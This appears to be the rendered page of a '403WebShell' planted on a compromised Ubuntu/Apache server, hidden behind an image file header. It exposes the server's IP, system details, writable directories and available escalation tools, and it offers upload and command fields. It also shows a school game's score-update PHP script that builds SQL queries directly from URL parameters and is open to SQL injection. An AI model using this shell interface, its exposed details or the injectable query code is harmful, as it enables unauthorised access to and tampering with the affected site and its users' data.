????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.61
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old8/Wordslide/Phps/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old8/Wordslide/Phps/updateScore.php
<?php
    
    require_once('connection.php');
    
    $DbId = $_GET['DbId'];
    $HighScore = $_GET['HighScore'];
    
    $sql = "SELECT HighScore FROM tblUsers WHERE Id=$DbId";
    
    $result = mysqli_query($connection, $sql);
    
    if ($result->num_rows > 0)
    {
        $row = mysqli_fetch_array($result);
        $HighScoreServer = $row['HighScore'];
        
        if ($HighScore > $HighScoreServer)
        {
            $sqlUpdate = "UPDATE tblUsers SET HighScore=$HighScore WHERE Id=$DbId";
            
            if ($connection->query($sqlUpdate) === TRUE)
            {
                //echo "HighScore submitted successfully" . "<br />";
            }
            else
            {
                //echo "Error while submitting High score" . "<br />";
            }
        }
        else
        {
            $HighScore = $HighScoreServer;
            //echo "Your score is less than server score" . "<br />";
        }
        
        $sqlSelect = "SELECT u.UserId, c.tblUser_Id, c.ChallengedUserIds, c.ChallengedScore FROM tblUsers u INNER JOIN tblChallenge c ON u.Id = c.tblUser_Id WHERE FIND_IN_SET($DbId, c.ChallengedUserIds) AND $HighScore>ChallengedScore";
        $result2 = mysqli_query($connection, $sqlSelect);
        
        if ($result2->num_rows > 0)
        {
            $rows2 = Array();
            
            while($row2 = mysqli_fetch_array($result2))
            {
                array_push($rows2, $row2);
            }
            
            echo json_encode(array("result"=>$rows2));
        }
        else
        {
            echo "No challenges";
        }
    }
    else
    {
        echo "Error while submitting High score";
    }
    
    mysqli_close($connection);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit